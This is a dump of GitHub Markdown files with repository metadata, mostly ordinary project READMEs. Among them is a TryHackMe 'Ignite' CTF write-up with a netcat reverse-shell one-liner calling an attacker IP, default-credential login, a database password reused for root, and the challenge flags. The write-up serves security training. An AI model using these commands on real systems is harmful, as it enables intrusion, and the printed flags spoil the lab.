hexsha stringlengths 40 40 | size int64 5 1.04M | ext stringclasses 6 values | lang stringclasses 1 value | max_stars_repo_path stringlengths 3 344 | max_stars_repo_name stringlengths 5 125 | max_stars_repo_head_hexsha stringlengths 40 78 | max_stars_repo_licenses listlengths 1 11 | max_stars_count int64 1 368k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 3 344 | max_issues_repo_name stringlengths 5 125 | max_issues_repo_head_hexsha stringlengths 40 78 | max_issues_repo_licenses listlengths 1 11 | max_issues_count int64 1 116k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 3 344 | max_forks_repo_name stringlengths 5 125 | max_forks_repo_head_hexsha stringlengths 40 78 | max_forks_repo_licenses listlengths 1 11 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 5 1.04M | avg_line_length float64 1.14 851k | max_line_length int64 1 1.03M | alphanum_fraction float64 0 1 | lid stringclasses 191 values | lid_prob float64 0.01 1 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
fa4b9b718d9b35d28bd0a710678d26fa36a0c1e2 | 245 | md | Markdown | README.md | nivinjoseph/n-sec | 9a12434c4f7e475af1e529fe021a7cb7cddb324e | [
"MIT"
] | null | null | null | README.md | nivinjoseph/n-sec | 9a12434c4f7e475af1e529fe021a7cb7cddb324e | [
"MIT"
] | 1 | 2021-02-28T15:53:18.000Z | 2021-02-28T15:53:18.000Z | README.md | nivinjoseph/n-sec | 9a12434c4f7e475af1e529fe021a7cb7cddb324e | [
"MIT"
] | null | null | null | # n-sec
Security library
For Windows development:
- Build tools => Open PowerShell as admin and run => npm install -g windows-build-tools
- OpenSSL => Go to https://slproweb.com/products/Win32OpenSSL.html => Get version Win64 OpenSSL v1.0.2q
| 27.222222 | 103 | 0.746939 | kor_Hang | 0.71438 |
fa4cbfc2aead7275bc3a3d1451f98699f2a0f307 | 8,742 | md | Markdown | TryHackMe/Ignite/README.md | mihaid-b/CyberSakura | f60e6b6bfd6898c69b84424b080090ae98f8076c | [
"MIT"
] | 1 | 2022-03-27T06:00:41.000Z | 2022-03-27T06:00:41.000Z | TryHackMe/Ignite/README.md | mihaid-b/CyberSakura | f60e6b6bfd6898c69b84424b080090ae98f8076c | [
"MIT"
] | null | null | null | TryHackMe/Ignite/README.md | mihaid-b/CyberSakura | f60e6b6bfd6898c69b84424b080090ae98f8076c | [
"MIT"
] | 1 | 2022-03-27T06:01:42.000Z | 2022-03-27T06:01:42.000Z | # Ignite
A new start-up has a few issues with their web server.
[Ignite](https://tryhackme.com/room/ignite)
## Topic's
- Network Enumeration
- Web Enumeration
- Security Misconfiguration
- Exploitation Upload
- Stored Passwords & Keys
## Appendix archive
Password: `1 kn0w 1 5h0uldn'7!`
## Task 1 Root it!
Root the box! Designed and created by [DarkStar7471](https://tryhackme.com/p/DarkStar7471), built by [Paradox](https://tryhackme.com/p/Paradox).
---
Enjoy the room! For future rooms and write-ups, follow [@darkstar7471](https://twitter.com/darkstar7471) on Twitter.
```
kali@kali:~/CTFs/tryhackme/Ignite$ sudo nmap -A -Pn -sS -sC -sV -O 10.10.61.59
[sudo] password for kali:
Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-14 09:40 CEST
Nmap scan report for 10.10.61.59
Host is up (0.040s latency).
Not shown: 999 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_/fuel/
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Welcome to FUEL CMS
Aggressive OS guesses: Linux 3.10 - 3.13 (95%), ASUS RT-N56U WAP (Linux 3.4) (95%), Linux 3.16 (95%), Linux 3.1 (93%), Linux 3.2 (93%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (92%), Linux 3.10 (92%), Linux 3.2 - 4.9 (92%), Linux 3.4 - 3.10 (92%), Linux 3.8 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
TRACEROUTE (using port 22/tcp)
HOP RTT ADDRESS
1 36.60 ms 10.8.0.1
2 36.85 ms 10.10.61.59
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.39 seconds
```
[fuelCMS 1.4.1 - Remote Code Execution](https://www.exploit-db.com/exploits/47138)
[FUEL Configuration Security Settings](https://docs.getfuelcms.com/general/security)
[http://10.10.61.59/fuel/login](http://10.10.61.59/fuel/login)
`admin:admin`

[http://10.10.61.59/fuel/pages/upload](http://10.10.61.59/fuel/pages/upload)
```
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.8.106.222 9001 >/tmp/f
```
```
kali@kali:~/CTFs/tryhackme/Ignite$ nc -nlvp 9001
listening on [any] 9001 ...
connect to [10.8.106.222] from (UNKNOWN) [10.10.61.59] 35044
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$ python -c 'import pty; pty.spawn("/bin/bash")'
www-data@ubuntu:/var/www/html$ cd /home
cd /home
www-data@ubuntu:/home$ ls
ls
www-data
www-data@ubuntu:/home$ cd www-data
cd www-data
www-data@ubuntu:/home/www-data$ ls
ls
flag.txt
www-data@ubuntu:/home/www-data$ cat flag.txt
cat flag.txt
6470e394cbf6dab6a91682cc8585059b
```
```
www-data@ubuntu:/home/www-data$ cat /var/www/html/fuel/application/config/database.php
<ata$ cat /var/www/html/fuel/application/config/database.php
```
```php
<?php
defined('BASEPATH') OR exit('No direct script access allowed');
/*
| -------------------------------------------------------------------
| DATABASE CONNECTIVITY SETTINGS
| -------------------------------------------------------------------
| This file will contain the settings needed to access your database.
|
| For complete instructions please consult the 'Database Connection'
| page of the User Guide.
|
| -------------------------------------------------------------------
| EXPLANATION OF VARIABLES
| -------------------------------------------------------------------
|
| ['dsn'] The full DSN string describe a connection to the database.
| ['hostname'] The hostname of your database server.
| ['username'] The username used to connect to the database
| ['password'] The password used to connect to the database
| ['database'] The name of the database you want to connect to
| ['dbdriver'] The database driver. e.g.: mysqli.
| Currently supported:
| cubrid, ibase, mssql, mysql, mysqli, oci8,
| odbc, pdo, postgre, sqlite, sqlite3, sqlsrv
| ['dbprefix'] You can add an optional prefix, which will be added
| to the table name when using the Query Builder class
| ['pconnect'] TRUE/FALSE - Whether to use a persistent connection
| ['db_debug'] TRUE/FALSE - Whether database errors should be displayed.
| ['cache_on'] TRUE/FALSE - Enables/disables query caching
| ['cachedir'] The path to the folder where cache files should be stored
| ['char_set'] The character set used in communicating with the database
| ['dbcollat'] The character collation used in communicating with the database
| NOTE: For MySQL and MySQLi databases, this setting is only used
| as a backup if your server is running PHP < 5.2.3 or MySQL < 5.0.7
| (and in table creation queries made with DB Forge).
| There is an incompatibility in PHP with mysql_real_escape_string() which
| can make your site vulnerable to SQL injection if you are using a
| multi-byte character set and are running versions lower than these.
| Sites using Latin-1 or UTF-8 database character set and collation are unaffected.
| ['swap_pre'] A default table prefix that should be swapped with the dbprefix
| ['encrypt'] Whether or not to use an encrypted connection.
|
| 'mysql' (deprecated), 'sqlsrv' and 'pdo/sqlsrv' drivers accept TRUE/FALSE
| 'mysqli' and 'pdo/mysql' drivers accept an array with the following options:
|
| 'ssl_key' - Path to the private key file
| 'ssl_cert' - Path to the public key certificate file
| 'ssl_ca' - Path to the certificate authority file
| 'ssl_capath' - Path to a directory containing trusted CA certificats in PEM format
| 'ssl_cipher' - List of *allowed* ciphers to be used for the encryption, separated by colons (':')
| 'ssl_verify' - TRUE/FALSE; Whether verify the server certificate or not ('mysqli' only)
|
| ['compress'] Whether or not to use client compression (MySQL only)
| ['stricton'] TRUE/FALSE - forces 'Strict Mode' connections
| - good for ensuring strict SQL while developing
| ['ssl_options'] Used to set various SSL options that can be used when making SSL connections.
| ['failover'] array - A array with 0 or more data for connections if the main should fail.
| ['save_queries'] TRUE/FALSE - Whether to "save" all executed queries.
| NOTE: Disabling this will also effectively disable both
| $this->db->last_query() and profiling of DB queries.
| When you run a query, with this setting set to TRUE (default),
| CodeIgniter will store the SQL statement for debugging purposes.
| However, this may cause high memory usage, especially if you run
| a lot of SQL queries ... disable this to avoid that problem.
|
| The $active_group variable lets you choose which connection group to
| make active. By default there is only one group (the 'default' group).
|
| The $query_builder variables lets you determine whether or not to load
| the query builder class.
*/
$active_group = 'default';
$query_builder = TRUE;
$db['default'] = array(
'dsn' => '',
'hostname' => 'localhost',
'username' => 'root',
'password' => 'mememe',
'database' => 'fuel_schema',
'dbdriver' => 'mysqli',
'dbprefix' => '',
'pconnect' => FALSE,
'db_debug' => (ENVIRONMENT !== 'production'),
'cache_on' => FALSE,
'cachedir' => '',
'char_set' => 'utf8',
'dbcollat' => 'utf8_general_ci',
'swap_pre' => '',
'encrypt' => FALSE,
'compress' => FALSE,
'stricton' => FALSE,
'failover' => array(),
'save_queries' => TRUE
);
// used for testing purposes
if (defined('TESTING'))
{
@include(TESTER_PATH.'config/tester_database'.EXT);
}
```
```
www-data@ubuntu:/home/www-data$ su - root
su - root
Password: mememe
root@ubuntu:~# cd /root
cd /root
root@ubuntu:~# ls
ls
root.txt
root@ubuntu:~# cat root.txt
cat root.txt
b9bbcb33e11b80be759c4e844862482d
```
1. User.txt
`6470e394cbf6dab6a91682cc8585059b`
2. Root.txt
`b9bbcb33e11b80be759c4e844862482d`
| 39.026786 | 270 | 0.608442 | eng_Latn | 0.825567 |
fa4d9a50869e066dd94ba39f2e826dce198f23e5 | 135 | md | Markdown | blog/stories/2020/04/23/a145342.md | scripting/Scripting-News | 348c428614b115fe390513defc285aceeedd4f09 | [
"MIT"
] | 93 | 2016-06-02T15:40:14.000Z | 2022-02-02T20:02:08.000Z | blog/stories/2020/04/23/a145342.md | scripting/Scripting-News | 348c428614b115fe390513defc285aceeedd4f09 | [
"MIT"
] | 231 | 2016-06-02T15:21:23.000Z | 2022-02-18T20:48:20.000Z | blog/stories/2020/04/23/a145342.md | scripting/Scripting-News | 348c428614b115fe390513defc285aceeedd4f09 | [
"MIT"
] | 11 | 2017-06-27T11:58:01.000Z | 2021-06-21T00:55:07.000Z | Elizabeth Warren's oldest brother <a href="https://twitter.com/ewarren/status/1253332675315724289">died</a> of coronavirus on Tuesday.
| 67.5 | 134 | 0.8 | eng_Latn | 0.414103 |
fa4e1cee6276ebfff46d5c2b38a648f2f5726c0c | 793 | md | Markdown | more-tools/README.md | Zerg00s/productivity-tools | 7e0fd8decb761ecba5cea16ae7b37595b7ca0137 | [
"MIT"
] | 24 | 2018-12-16T20:04:21.000Z | 2022-03-11T10:00:54.000Z | more-tools/README.md | Zerg00s/productivity-tools | 7e0fd8decb761ecba5cea16ae7b37595b7ca0137 | [
"MIT"
] | null | null | null | more-tools/README.md | Zerg00s/productivity-tools | 7e0fd8decb761ecba5cea16ae7b37595b7ca0137 | [
"MIT"
] | 6 | 2019-08-05T21:27:00.000Z | 2021-09-15T14:19:32.000Z | # Extra SharePoint produtivity tools
What can I say? Here it goes a bigger list of tools for SharePoint
---
## List of Tools
| Name | Image | Description
| ---- | ----- | ------------------ |
|[XML Tree](https://chrome.google.com/webstore/detail/xml-tree/gbammbheopgpmaagmckhpjbfgdfkpadb)|  | Displays XML data in a user friendly way. SharePoint REST API returns an XML by default. If for some reason, you are OK with XML and you want to make this XML user friendly - use [XML tree](https://chrome.google.com/webstore/detail/xml-tree/gbammbheopgpmaagmckhpjbfgdfkpadb). |
| [Mockaroo](Mockaroo) |  | Generates realistic mock data in any popular format such as JSON or CSV. JSON format is excellent when you are using PnPjs or PowerShell PnP |
| 61 | 401 | 0.727617 | eng_Latn | 0.85984 |
fa4f0814ff0d573c1429dc7944f504852cf1677a | 3,673 | md | Markdown | README.md | infinispan/infinispan-hadoop | 446f5618d02fe53554ed41c90b8e3e26426e784c | [
"Apache-2.0"
] | 4 | 2015-11-23T06:01:54.000Z | 2017-11-20T23:27:19.000Z | README.md | infinispan/infinispan-hadoop | 446f5618d02fe53554ed41c90b8e3e26426e784c | [
"Apache-2.0"
] | 10 | 2015-08-31T09:25:04.000Z | 2022-02-09T23:00:35.000Z | README.md | infinispan/infinispan-hadoop | 446f5618d02fe53554ed41c90b8e3e26426e784c | [
"Apache-2.0"
] | 5 | 2015-08-26T10:17:54.000Z | 2018-12-17T16:10:27.000Z | # Infinispan Hadoop [](https://travis-ci.org/infinispan/infinispan-hadoop)
Integrations with Apache Hadoop and related frameworks.
### Compatibility
| Version | Infinispan | Hadoop | Java
| -------- | ---------- | ----- | ----
| 0.1 | 8.0.x | 2.x | 8 |
| 0.2 | 8.2.x | 2.x | 8 |
| 0.3 | 9.4.x | 2.x 3.x | 8 |
| 0.4 | 9.4.x | 2.x 3.x | 8 |
### InfinispanInputFormat and InfinispanOutputFormat
Implementation of Hadoop InputFormat and OutputFormat that allows reading and writing data to Infinispan Server with best data locality.
Partitions are generated based on segment ownership and allows processing of data in a cache using multiple splits in parallel.
### Maven Coordinates
```
<dependency>
<groupId>org.infinispan.hadoop</groupId>
<artifactId>infinispan-hadoop-core</artifactId>
<version>0.4</version>
</dependency>
```
#### Sample usage with Hadoop YARN mapreduce application:
```
import org.infinispan.hadoop.*;
import org.apache.hadoop.conf.Configuration;
import org.apache.hadoop.mapreduce.Job;
Configuration configuration = new Configuration();
String hosts = "172.17.0.2:11222;172.17.0.3:11222";
// Configures input/output caches
configuration.set(InfinispanConfiguration.INPUT_REMOTE_CACHE_SERVER_LIST, hosts);
configuration.set(InfinispanConfiguration.OUTPUT_REMOTE_CACHE_SERVER_LIST, hosts);
configuration.set(InfinispanConfiguration.INPUT_REMOTE_CACHE_NAME, "map-reduce-in");
configuration.set(InfinispanConfiguration.OUTPUT_REMOTE_CACHE_NAME, "map-reduce-out");
Job job = Job.getInstance(configuration, "Infinispan job");
// Map and Reduce implementation
job.setMapperClass(MapClass.class);
job.setReducerClass(ReduceClass.class);
job.setInputFormatClass(InfinispanInputFormat.class);
job.setOutputFormatClass(InfinispanOutputFormat.class);
```
#### Supported Configurations:
Name | Description | Default
------------- | -------------|----------
hadoop.ispn.input.filter.factory | The name of the filter factory deployed on the server to pre-filter data before reading | null (no filtering)
hadoop.ispn.input.cache.name | The name of cache where data will be read from | "default"
hadoop.ispn.input.read.batch | Batch size when reading from the cache | 5000
hadoop.ispn.output.write.batch | Batch size when writing to the cache | 500
hadoop.ispn.input.remote.cache.servers | List of servers of the input cache, in the format ```host1:port1;host2:port2``` | localhost:11222
hadoop.ispn.output.cache.name | The name of cache where job results will be written to | "default"
hadoop.ispn.output.remote.cache.servers | List of servers of the output cache, in the format ```host1:port1;host2:port2```
hadoop.ispn.input.converter | Class name with an implementation of ```org.infinispan.hadoop.KeyValueConverter```, applied after reading from the cache | null (no converting)
hadoop.ispn.output.converter | Class name with an implementation of ```org.infinispan.hadoop.KeyValueConverter```, applied before writing | null (no converting)
#### Demos
Refer to https://github.com/infinispan/infinispan-hadoop/tree/master/samples/
#### Releasing
The $MAVEN_HOME/conf/settings.xml must contain credentials for the release repository. Add the following section in ```<servers>```:
```xml
<server>
<id>jboss-snapshots-repository</id>
<username>RELEASE_USER</username>
<password>RELEASE_PASS</password>
</server>
<server>
<id>jboss-releases-repository</id>
<username>RELEASE_USER</username>
<password>RELEASE_PASS</password>
</server>
```
To release:
```
mvn release:prepare release:perform -B
```
| 37.479592 | 173 | 0.742445 | eng_Latn | 0.678116 |
fa4f6fa174d300635197fb1bc78ec50e95d7cf05 | 4,506 | md | Markdown | articles/azure-monitor/insights/insights-overview.md | changeworld/azure-docs.hu-hu | f0a30d78dd2458170473188ccce3aa7e128b7f89 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | articles/azure-monitor/insights/insights-overview.md | changeworld/azure-docs.hu-hu | f0a30d78dd2458170473188ccce3aa7e128b7f89 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | articles/azure-monitor/insights/insights-overview.md | changeworld/azure-docs.hu-hu | f0a30d78dd2458170473188ccce3aa7e128b7f89 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | ---
title: Az információk áttekintése Azure Monitorban | Microsoft Docs
description: Az adatvizsgálatok testreszabott figyelési élményt nyújtanak az egyes alkalmazások és szolgáltatások Azure Monitor. Ez a cikk a jelenleg elérhető összes információ rövid leírását tartalmazza.
ms.subservice: ''
ms.topic: conceptual
author: bwren
ms.author: bwren
ms.date: 05/22/2019
ms.openlocfilehash: 15ea7698c9e90fa8b0dfa20f71b552a2b0e9c7d2
ms.sourcegitcommit: 747a20b40b12755faa0a69f0c373bd79349f39e3
ms.translationtype: MT
ms.contentlocale: hu-HU
ms.lasthandoff: 02/27/2020
ms.locfileid: "77657248"
---
# <a name="overview-of-insights-in-azure-monitor"></a>Az információk áttekintése Azure Monitor
Az egyes alkalmazásokhoz és szolgáltatásokhoz testreszabott figyelési funkciókkal szolgálnak. A [Azure monitor adatplatformban](../platform/data-platform.md) tárolják az adatokat, és más Azure monitor funkciókat is kihasználhatnak az elemzéshez és a riasztásokhoz, azonban további adatokat gyűjthetnek, és egyedi felhasználói élményt biztosíthatnak a Azure Portal. A Azure Portal Azure Monitor menüjének bepillantást **nyerhet a bepillantást az** adatokból.
A következő szakaszokban a Azure Monitor aktuálisan elérhető információinak rövid leírását találhatja meg. További részletekért tekintse meg a részletes dokumentációt.
## <a name="application-insights"></a>Application Insights
Az Application Insights egy bővíthető és több platformon működő alkalmazásteljesítmény-felügyeleti (APM) szolgáltatás webfejlesztőknek. Az élő webalkalmazásának figyelésére használhatja. Számos platformon használható, többek között a .NET, a Node. js és a Java EE, helyszíni, hibrid vagy nyilvános felhőben üzemelő alkalmazásokhoz. Emellett a DevOps folyamattal is integrálható, és a különböző fejlesztői eszközökhöz kapcsolódó kapcsolódási pontokkal rendelkezik.
Lásd: [Mi az Application Insights?](../app/app-insights-overview.md)

## <a name="azure-monitor-for-containers"></a>Azure Monitor tárolókhoz
A tárolók Azure Monitor figyeli az Azure Kubernetes szolgáltatásban (ak) üzemeltetett Azure Container Instances vagy felügyelt Kubernetes-fürtökön üzembe helyezett tároló-munkaterhelések teljesítményét. A tárolók alapvető fontosságú, különösen akkor, ha nagy mennyiségű, több alkalmazással rendelkező egy éles fürtöt futtat.
Lásd: [Azure monitor a tárolók áttekintéséhez](../insights/container-insights-overview.md).

## <a name="azure-monitor-for-resource-groups-preview"></a>Erőforráscsoportok Azure Monitor (előzetes verzió)
Az erőforráscsoportok Azure Monitor segíti az egyes erőforrásokkal kapcsolatos problémák osztályozását és diagnosztizálását, miközben az erőforráscsoport állapotára és teljesítményére vonatkozó kontextust kínál.
Lásd: [erőforráscsoportok figyelése Azure monitor (előzetes verzió)](../insights/resource-group-insights.md).

## <a name="azure-monitor-for-vms-preview"></a>Azure Monitor for VMs (előzetes verzió)
A virtuális gépek az Azure Monitor figyeli az Azure-beli virtuális gépek (VM), és a virtuálisgép-méretezési csoportok ipari méretekben. A szolgáltatás elemzi a Windows és Linux rendszerű virtuális gépek teljesítményét és állapotát, valamint figyeli folyamataikat és a más erőforrásokkal és külső folyamatokkal kapcsolatos függőségeiket.
Lásd: [Mi az Azure monitor for VMS?](vminsights-overview.md)

## <a name="azure-monitor-for-networks-preview"></a>Azure Monitor hálózatok számára (előzetes verzió)
A [hálózatok Azure monitor](network-insights-overview.md) a hálózati erőforrások állapotának és metrikáinak átfogó áttekintését nyújtja. A speciális keresési funkció segítségével azonosíthatja az erőforrás-függőségeket, és engedélyezheti az olyan forgatókönyveket, mint például a webhelyet üzemeltető erőforrás azonosítása, egyszerűen csak a webhely nevét keresi.

## <a name="next-steps"></a>Következő lépések
* További információ az elemzések által kihasználható [Azure monitor adatplatformról](../platform/data-platform.md) .
* Ismerje meg a [Azure monitor által használt különböző adatforrásokat](../platform/data-sources.md) , valamint az egyes elemzések által gyűjtött különféle adatokat.
| 79.052632 | 463 | 0.825566 | hun_Latn | 1.000006 |
fa5017d1cc239d63c29c391c47f28775f60047e3 | 1,019 | md | Markdown | _posts/2017-06-10-translucent_status_bar.md | LandChanning/landchanning.github.io | 7eddcceb2e8176dc38b44fb5cf02dcae0fbbfd9a | [
"Apache-2.0"
] | null | null | null | _posts/2017-06-10-translucent_status_bar.md | LandChanning/landchanning.github.io | 7eddcceb2e8176dc38b44fb5cf02dcae0fbbfd9a | [
"Apache-2.0"
] | null | null | null | _posts/2017-06-10-translucent_status_bar.md | LandChanning/landchanning.github.io | 7eddcceb2e8176dc38b44fb5cf02dcae0fbbfd9a | [
"Apache-2.0"
] | null | null | null | ---
layout: post
title: "Traslucent StatusBar 适配总结"
subtitle: ""
date: 2017-06-10 11:44
author: "Channing"
header-img: "img/post-bg-2015.jpg"
tags:
- Theme
- StatusBar
---
总结Translucent的实现过程及需注意的问题。
# 适配目标
android 4.4 SDK 开始支持Translucent StatusBar的配置,所以 4.4 是一个分水岭。

android 4.4 以下:正常显示content、drawer layout的nav,不被StatusBar遮挡。

android 4.4 :StatusBar全透明,content、drawer layout的nav不被遮挡。

android 4.4 以上:Material Design效果,状态栏颜色为colorPrimaryDark同时覆盖半透明效果,content、drawer layout的nav不被遮挡。(该效果在使用NavigationView作为DrawerLayout的nav时才会出现,使用别的View做nav不能出现半透明StatusBar,发现一篇说这个的,具体情况待实现http://www.jianshu.com/p/ab937c80ed6e)
# 适配方式一:Style 配合 android:fitsSystemWindows
| 35.137931 | 223 | 0.782139 | yue_Hant | 0.424065 |
fa50bb100dab6ab57a0ecebb6aa09d535c129631 | 3,902 | md | Markdown | README.md | ingvoo/patterns | e1c5800fff84adf06cbb0473a39ca89fab1248f0 | [
"MIT"
] | null | null | null | README.md | ingvoo/patterns | e1c5800fff84adf06cbb0473a39ca89fab1248f0 | [
"MIT"
] | 5 | 2021-11-25T14:45:33.000Z | 2022-03-16T15:43:14.000Z | README.md | ingvoo/patterns | e1c5800fff84adf06cbb0473a39ca89fab1248f0 | [
"MIT"
] | null | null | null | # Patterns
A starterkit to create web styleguides with [Fractal](http://fractal.build/) and [Webpack](https://webpack.js.org/).
- Fractal pre-configured with [Nunjucks](https://mozilla.github.io/nunjucks/)
- JavaScript bundling with Webpack and [Babel](http://babeljs.io/)
- Sass compilation, including [Autoprefixer](https://github.com/postcss/autoprefixer)
- Manage design tokens with [Style Dictonary](https://amzn.github.io/style-dictionary/#/README)
- [SVG icons sprite](https://css-tricks.com/svg-symbol-good-choice-icons/) generation
- Live reload (with hot module replacement) for comfortable development
- Automated release management with [release-it](https://github.com/webpro/release-it)
## Installation
Prerequisites: [Node.js](https://nodejs.org/en/) >= 10, <= 12
Inside the directory of your choice, install a copy of the starterkit with:
```bash
curl -L https://github.com/ingvijonasson/patterns/archive/master.tar.gz | tar zx --strip 1
```
Then install the npm dependencies with:
```bash
npm install
```
## Getting started
To start the development server, run:
```bash
npm start
```
You can now access your styleguide at [localhost:3000](http://localhost:3000).
You’re all set, start to:
- Create components as `.nunj` (Nunjucks) files inside the `components` directory
- Write some style inside `assets/scss/main.scss`
- Write JavaScript inside `assets/scripts/main.js`
- Put some `*.svg` icons in the `assets/icons` directory
- Write documentation as `.md` (Markdown) files inside the `docs` directory.
## Build
You can build a static version of the styleguide to deploy it wherever you like by running:
```
npm run build
```
The generated files go to the `dist` directory.
## Release
The starterkit comes with a preconfigured release management tool. It will automatically update the `CHANGELOG.md` file at the root of the project based on the commit messages as long as they follow the [Angular commit guidelines](https://github.com/angular/angular.js/blob/master/DEVELOPERS.md#-git-commit-guidelines). It will also bump the version number in the `package.json`, run the build command above, commit, tag and push the changes. This process is interactive and you’ll be able to skip steps manually if you like.
To release a new version run:
```bash
npm run release [patch|minor|major|version_number]
```
By default the version bump is automatically determined based on the commits messages.
Read more in the [release-it documentation](https://github.com/webpro/release-it).
## Misc
### Browsers support
The browsers support is defined in `.browserslistrc`. It’s used both by [Autoprefixer](https://github.com/postcss/autoprefixer) for the CSS and by [@babel/preset-env](https://babeljs.io/docs/en/babel-preset-env) for the JavaScript.
Check [browserslist’s documentation](https://github.com/ai/browserslist) to change the browser support.
### Icons
Icons placed inside `assets/icons` are combined into a sprite called `icons.svg` when referenced. To load them, either reference them in your JavaScript:
```js
import 'icons/foo.svg';
```
Or in your stylesheet:
```scss
background-image: url('../icons/foo.svg');
```
Webpack will automatically rewrite the links to the sprite with the correct identifier. See [svg-sprite-loader](https://github.com/kisenka/svg-sprite-loader) documentation for more information.
You can then easily use an icon in a template with the icon snippet:
```nunj
{% render '@icon', { id: 'foo', class: 'bar' } %}
```
**Warning:** This method of including remote SVG file is not supported by Internet Explorer 11 and below. You may want to polyfill it with [svgxuse](https://github.com/Keyamoon/svgxuse).
## Credits
This project was originally cloned from https://github.com/liip/styleguide-starterkit. Very special thanks to to [Liip](https://github.com/liip) and to [Benoît Burgener](https://github.com/LeBenLeBen).
| 35.472727 | 525 | 0.752435 | eng_Latn | 0.948271 |
fa5103998ef7461939ad1d010dd00b8f486d4b0c | 1,390 | md | Markdown | vendor/github.com/veandco/go-sdl2/sdl/TODO.md | ucirello/mlflappygopher | e51f527e57e9cd0cbb84d8b75a569a7f45b6d341 | [
"Apache-2.0"
] | 1 | 2018-08-24T00:33:52.000Z | 2018-08-24T00:33:52.000Z | vendor/github.com/veandco/go-sdl2/sdl/TODO.md | ucirello/mlflappygopher | e51f527e57e9cd0cbb84d8b75a569a7f45b6d341 | [
"Apache-2.0"
] | 1 | 2019-01-24T10:51:25.000Z | 2019-01-24T10:51:25.000Z | vendor/github.com/veandco/go-sdl2/sdl/TODO.md | ucirello/mlflappygopher | e51f527e57e9cd0cbb84d8b75a569a7f45b6d341 | [
"Apache-2.0"
] | 4 | 2019-04-10T05:10:13.000Z | 2020-05-21T16:12:03.000Z | ## 2.0.6
### General
Blend Mode
- [x] SDL_ComposeCustomBlendMode()
CPU Info
- [x] SDL_HasNEON()
Game Controller
- [x] SDL_GameControllerGetVendor()
- [x] SDL_GameControllerGetProduct()
- [x] SDL_GameControllerGetProductVersion()
- [x] SDL_GameControllerNumMappings()
- [x] SDL_GameControllerMappingForIndex()
Hints
- [x] SDL_HINT_AUDIO_RESAMPLING_MODE
- [x] SDL_HINT_RENDER_LOGICAL_SIZE_MODE
- [x] SDL_HINT_MOUSE_NORMAL_SPEED_SCALE
- [x] SDL_HINT_MOUSE_RELATIVE_SPEED_SCALE
- [x] SDL_HINT_TOUCH_MOUSE_EVENTS
Joystick
- [x] SDL_JoystickGetDeviceVendor()
- [x] SDL_JoystickGetDeviceProduct()
- [x] SDL_JoystickGetDeviceProductVersion()
- [x] SDL_JoystickGetDeviceType()
- [x] SDL_JoystickGetDeviceInstanceID()
- [x] SDL_JoystickGetVendor()
- [x] SDL_JoystickGetProduct()
- [x] SDL_JoystickGetProductVersion()
- [x] SDL_JoystickGetType()
- [x] SDL_JoystickGetAxisInitialState()
RW Ops
- [x] SDL_LoadFile()
- [x] SDL_LoadFile_RW()
Surface
- [x] SDL_DuplicateSurface()
Vulkan
- [x] SDL_Vulkan_LoadLibrary()
- [x] SDL_Vulkan_GetVkGetInstanceProcAddr()
- [x] SDL_Vulkan_GetInstanceExtensions()
- [x] SDL_Vulkan_CreateSurface()
- [x] SDL_Vulkan_GetDrawableSize()
- [x] SDL_Vulkan_UnloadLibrary()
### Windows
Hints
- [x] SDL_HINT_WINDOWS_INTRESOURCE_ICON
- [x] SDL_HINT_WINDOWS_INTRESOURCE_ICON_SMALL
## Miscellaneous
- [ ] Add ability to set window title bar color on runtime
| 19.857143 | 58 | 0.769065 | yue_Hant | 0.95151 |
fa5217b60e5ce25cf05bc67bc965c3d714e40b64 | 1,577 | md | Markdown | README.md | slu-data-science-seminar/fall-2016-seminar-03 | f3326d4d758632f20637582a3c2d4a5984b6e2cd | [
"MIT"
] | null | null | null | README.md | slu-data-science-seminar/fall-2016-seminar-03 | f3326d4d758632f20637582a3c2d4a5984b6e2cd | [
"MIT"
] | null | null | null | README.md | slu-data-science-seminar/fall-2016-seminar-03 | f3326d4d758632f20637582a3c2d4a5984b6e2cd | [
"MIT"
] | null | null | null | # fall-2016-seminar-03
### Repository Contents
This repository contains files for:
- `gapminderCollapsed.csv`
- `seminar-03.R`
- `LICENSE.md`
- `README.md`
- `.gitignore`
### Fall 2016 - Plots & Figures in `R`
This is the second edition of the SLU Data Science Seminar (DSS). This semester is focused on using `R` to produce plots and figures of your data. We'll pay particular attention to a well-known graphics package named [`ggplot2`](https://en.wikipedia.org/wiki/Ggplot2). Along the way, we'll also provide you with an overview of the nuts and bolts of `R`.
### About the SLU Data Science Seminar
The SLU Data Science Seminar (DSS) is a collaborative, interdisciplinary group focused on building data science skills for students in the social sciences and humanities using open-source software and tools. The SLU DSS is co-organized by [Christina Gacia, Ph.D.](mailto:garciacm@slu.edu), [Kelly Lovejoy, Ph.D.](mailto:lovejoykg@slu.edu), and [Christopher Prener, Ph.D.](mailto:prenercg@slu.edu}).
### About Saint Louis University
[Saint Louis University](http://wwww.slu.edu) is a Catholic, Jesuit institution that values academic excellence, life-changing research, compassionate health care, and a strong commitment to faith and service. Founded in 1818, the University fosters the intellectual and character development of more than 13,000 students on two campuses in St. Louis and Madrid, Spain. Building on a legacy of nearly 200 years, Saint Louis University continues to move forward with an unwavering commitment to a higher purpose, a greater good.
| 83 | 527 | 0.769182 | eng_Latn | 0.989168 |
